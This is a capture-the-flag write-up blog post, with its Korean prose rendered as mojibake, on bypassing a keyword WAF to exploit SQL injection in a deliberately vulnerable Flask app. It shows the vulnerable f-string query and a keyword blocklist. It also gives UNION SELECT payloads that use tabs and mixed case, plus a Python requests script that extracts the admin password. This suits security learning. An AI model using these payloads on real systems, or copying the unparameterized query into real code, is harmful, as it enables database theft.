your name here

[2025-07-16] SQL injection Bypass WAF

๐Ÿฆฅ ๋ณธ๋ฌธ

import os
from flask import Flask, request
from flask_mysqldb import MySQL

app = Flask(__name__)
app.config['MYSQL_HOST'] = os.environ.get('MYSQL_HOST', 'localhost')
app.config['MYSQL_USER'] = os.environ.get('MYSQL_USER', 'user')
app.config['MYSQL_PASSWORD'] = os.environ.get('MYSQL_PASSWORD', 'pass')
app.config['MYSQL_DB'] = os.environ.get('MYSQL_DB', 'users')
mysql = MySQL(app)

keywords = ['union', 'select', 'from', 'and', 'or', 'admin', ' ', '*', '/']
def check_WAF(data):
    for keyword in keywords:
        if keyword in data:
            return True

    return False

@app.route('/', methods=['POST', 'GET'])
def index():
    uid = request.args.get('uid')
    if uid:
        if check_WAF(uid):
            return 'your request has been blocked by WAF.'
        cur = mysql.connection.cursor()
        cur.execute(f"SELECT * FROM user WHERE uid='{uid}';")
        result = cur.fetchone()
        if result:
            return template.format(uid=uid, result=result[1])
        else:
            return template.format(uid=uid, result='')

    else:
        return template

if __name__ == '__main__':
    app.run(host='0.0.0.0')

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค๋ฅผ ๋ณด๋‹ˆ column์€ idx, uid, upw๋กœ ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋‹ค.

guest๋ฅผ ์ž…๋ ฅํ•˜๋ฉด result[1]์ธ guest ๊ฐ’๋งŒ ์ถœ๋ ฅ๋˜๋Š” ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค. admin์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ FLAG์ธ๋ฐ, admin ๊ฐ’์€ ํ•„ํ„ฐ๋ง ๋˜์–ด ์žˆ์—ˆ๋‹ค โ†’ ADmin ๊ฐ™์€ ๋Œ€์†Œ๋ฌธ์ž ํ˜ผ์šฉ์œผ๋กœ ํ•„ํ„ฐ๋ง ์šฐํšŒ๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค

๊ณต๋ฐฑ๋„ ํ•„ํ„ฐ๋ง์ด ๋˜์–ด ์žˆ์—ˆ๋‹ค. ์ฃผ์„์œผ๋กœ ๊ณต๋ฐฑ์„ ํ”ผํ•˜๋ ค ํ–ˆ์œผ๋‚˜ ์ฃผ์„ ์—ญ์‹œ ํ•„ํ„ฐ๋ง์ด ๋˜์–ด ์žˆ์—ˆ๋‹ค. ํƒญ์„ ์˜๋ฏธํ•˜๋Š” /t โ†’ %09๋ฅผ ํ†ตํ•ด ํ•„ํ„ฐ๋ง ์šฐํšŒ๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค

๋˜ํ•œ UNION์„ ์‚ฌ์šฉํ•  ๊ฑฐ๋ฉด ์•ž์˜ ๊ตฌ๋ฌธ๊ณผ column ์ˆ˜๊ฐ€ ๋งž์•„์•ผ ํ•œ๋‹ค.

UNION SELECT null, upw, null, From user Where uid = 'admiN);

์œ„์™€ ๊ฐ™์€ ์ฝ”๋“œ๋กœ ๋ณด๋‚ด์•ผ ํ•œ๋‹ค. โ€˜%09Union%09Select%09null,upw,null%09From%09user%09where%09uid="Admin"%23์„ ์‚ฌ์ดํŠธ์˜ form์„ ํ†ตํ•ด ๋ณด๋ƒˆ๋Š” ๋ฐ ์•ˆ๋˜๋Š” ๊ฑฐ๋‹ค..

ํ’€์ด

'%09Union%09Select%09null,upw,null%09From%09user%09where%09uid=\"Admin\"%23

์„ form์„ ํ†ตํ•ด ๋ณด๋‚ด๊ฒŒ ๋˜๋ฉด ์ด์ค‘ ์ธ์ฝ”๋”ฉ ์ฒ˜๋ฆฌ๊ฐ€ ๋˜์–ด์„œ %09๊ฐ€ %2509๊ฐ€ ๋œ๋‹ค.

import requests

url = "http://host8.dreamhack.games:16809/"
params = {
    "uid": "'\tUnion\tSelect\tnull,upw,null\tFrom\tuser\twhere\tuid=\"Admin\"#"
}

response = requests.get(url, params=params)
print(response.text)

์„ ํ†ตํ•ด ๋ณด๋‚ด์•ผ ์›ํ•˜๋Š” ๊ฒฐ๊ณผ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค.

ํ•˜โ€ฆ ์ด๊ฒƒ๋„ ๋ชจ๋ฅด๊ณ  ๋˜‘๊ฐ™์€ ์ฝ”๋“œ์— ์‹œ๊ฐ„ ์—„์ฒญ ์ผ๋‹คโ€ฆ

Categories:

Updated:

Leave a comment

You may also enjoy